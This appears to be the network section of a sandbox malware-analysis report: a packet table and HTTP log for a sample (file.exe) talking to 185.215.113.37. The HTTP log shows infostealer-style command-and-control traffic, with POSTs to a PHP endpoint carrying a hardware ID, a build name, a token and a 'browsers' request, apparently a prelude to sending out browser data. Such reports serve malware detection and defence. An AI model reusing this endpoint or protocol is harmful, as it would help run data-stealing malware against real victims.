Sep 26, 2024 02:40:22.191349983 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191361904 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191373110 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191374063 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191409111 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191411972 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191452980 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191459894 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191473961 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191497087 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191520929 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191536903 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191575050 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191581964 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191589117 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191637993 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191663980 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191663980 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191679001 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191719055 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191730022 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191752911 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191757917 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191766977 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191786051 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191786051 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191800117 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191804886 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191819906 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191853046 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191875935 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191889048 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191906929 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191915035 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191920996 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191936016 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.191941023 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191960096 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.191977978 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192059994 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192071915 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192085028 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192097902 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192106009 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192121983 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192147017 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192219973 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192230940 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192243099 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192255974 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192266941 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192269087 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192279100 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192281961 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192296982 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192300081 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192337036 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192363024 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192375898 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192387104 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192392111 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192409992 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192431927 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192502975 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192517042 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192528963 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192540884 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192548990 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192560911 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192573071 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192662954 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192683935 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192697048 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192708969 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192709923 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192723036 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192735910 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192738056 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192749977 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192763090 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192765951 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192776918 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192806005 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192938089 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192950010 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192960978 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192972898 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192980051 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.192986012 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.192998886 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.193001032 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.193027020 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.193042994 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.226141930 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.231076002 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451395988 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451427937 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451441050 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451457977 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451459885 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.451478958 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451493025 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451502085 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.451502085 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.451505899 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451533079 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.451556921 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.451591969 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451605082 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451617956 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451627016 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.451627970 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451643944 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.451663971 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.451690912 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451705933 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451719046 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451726913 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.451756001 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.451782942 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451793909 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451807976 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451832056 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.451854944 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.451952934 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451965094 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451977968 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451987982 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.451991081 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.451999903 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452002048 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452013969 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452023029 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452025890 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452039003 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452049017 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452083111 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452131033 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452146053 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452158928 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452167034 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452183962 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452205896 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452234030 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452245951 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452258110 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452269077 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452286005 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452303886 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452395916 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452406883 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452421904 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452434063 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452442884 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452446938 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452460051 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452467918 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452472925 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452485085 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452507973 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452636003 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452647924 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452661037 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452672005 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452673912 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452685118 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452694893 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452697992 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452719927 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452752113 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452779055 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452790976 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452802896 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452816010 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452816010 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452840090 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452863932 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452934980 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452946901 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452960014 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452971935 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452971935 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.452985048 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.452986956 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453003883 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453027964 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453084946 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453111887 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453120947 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453123093 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453136921 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453142881 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453150034 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453160048 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453165054 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453177929 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453177929 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453188896 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453197002 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453233957 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453422070 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453434944 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453444958 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453457117 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453459024 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453469992 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453485012 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453485966 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453497887 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453510046 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453510046 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453524113 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453536987 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453548908 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453574896 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453706026 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453717947 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453731060 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453742981 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453754902 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453754902 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.453778982 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.453805923 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:22.541945934 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:22.542010069 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:23.093648911 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:23.093683004 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:23.098459005 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:23.098741055 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:23.817655087 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:23.821768045 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:23.884638071 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:23.890759945 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:24.128273964 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:24.128288984 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:24.128298998 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:24.128397942 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:24.130759954 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:24.135544062 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:24.381064892 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:24.381078005 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:24.381089926 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:24.381099939 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:24.381119013 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:24.381158113 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:24.381169081 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:24.381294966 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:24.381294966 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:24.398205996 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:24.403038979 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:25.114589930 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:25.114715099 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:25.141026020 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:25.145884037 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:25.369381905 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:25.369455099 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:25.370599985 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:25.375411034 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:26.092384100 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:26.092441082 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:31.097568035 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:31.097711086 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:31.584419012 CEST	49705	80	192.168.2.8	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	185.215.113.37	80	7476	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 02:40:07.714461088 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 02:40:08.438813925 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 02:40:08.441525936 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBG Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 34 37 43 44 36 43 32 32 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 2d 2d 0d 0a Data Ascii: ------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="hwid"B547CD6C22534228319403------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="build"save------GIDBKKKKKFBGDGDHIDBG--
Sep 26, 2024 02:40:08.685982943 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 00:40:08 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 7a 59 79 4e 7a 4a 69 59 57 4d 33 4e 6a 49 35 59 54 45 32 4e 44 6b 77 59 6d 4d 32 5a 6d 56 69 4e 7a 68 6c 5a 57 49 7a 4d 54 5a 6d 4f 44 45 34 4d 32 55 79 5a 6d 56 6d 4f 47 59 34 5a 47 51 33 4d 44 4e 68 4e 7a 5a 6c 4e 54 51 34 5a 54 5a 6a 59 6a 4a 6c 4e 47 4a 6a 5a 54 56 6d 4d 6a 67 34 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NzYyNzJiYWM3NjI5YTE2NDkwYmM2ZmViNzhlZWIzMTZmODE4M2UyZmVmOGY4ZGQ3MDNhNzZlNTQ4ZTZjYjJlNGJjZTVmMjg4fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwxfHlibmNiaHlsZXBtZXw=
Sep 26, 2024 02:40:08.687124014 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBF Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 2d 2d 0d 0a Data Ascii: ------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="message"browsers------EBKKKEGIDBGHIDGDHDBF--
